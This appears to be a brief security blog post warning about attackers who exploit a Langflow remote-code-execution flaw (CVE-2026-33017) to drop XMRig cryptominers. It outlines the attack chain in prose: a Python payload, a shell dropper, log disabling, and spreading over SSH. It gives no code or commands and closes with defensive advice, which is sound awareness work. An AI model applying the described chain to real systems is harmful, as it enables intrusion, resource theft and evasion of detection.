June 30, 2026

Fools guide to illict crypto miners via Langflow RCE exploit

Threat:

By KN

1 min read

Langflow is currently being exploited due to an existing critical vulnerability that allows for unauthenticated remote code execution (CVE-2026–33017, CVSS 9.3), The main threat from these attacks is the installment and activation of cryptocurrency miners on compromised systems.

What is the impact:

The primary impact that exists for organisations with exposed langflow endpoints are at risk of illicit cryptocurrency miners running which in turn would cause resource degradation and potential lateral movement through the wider system via SSH keys. The malware aims to disable security controls while also ensuring persistence, one of the key security controls it aims to disable are system logs. Due to this detection and in turn recovery from this attack can be particularly difficult.

What is Langflow:

Langflow is an open-source framework that is designed to aid developers in building and deploying AI-powered workflows that use large-language-model (LLM) components.

How the attack works:

Hackers are scanning for and targeting exposed application endpoints, exploiting the RCE flaw to execute a python script. This script downloads a shell script dropper, which then fetches and deploys an XMRig miner, disables host security features, and spreads to other SSH-reachable hosts.

"In this campaign, a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached,"

The above is a statement made by micro trend researchers, and can be found in the following technical report — From Langflow to Monero: Inside CVE-2026–33017 Cryptominer | Trend Micro (US)

Mitigation:

Defenders must secure and minimize the exposure of Langflow and other AI application endpoints, as these are becoming new entry points for attackers. Implementing robust monitoring for suspicious activity and applying Zero trust principles and controls are crucial to reduce overall risk and limit lateral movement.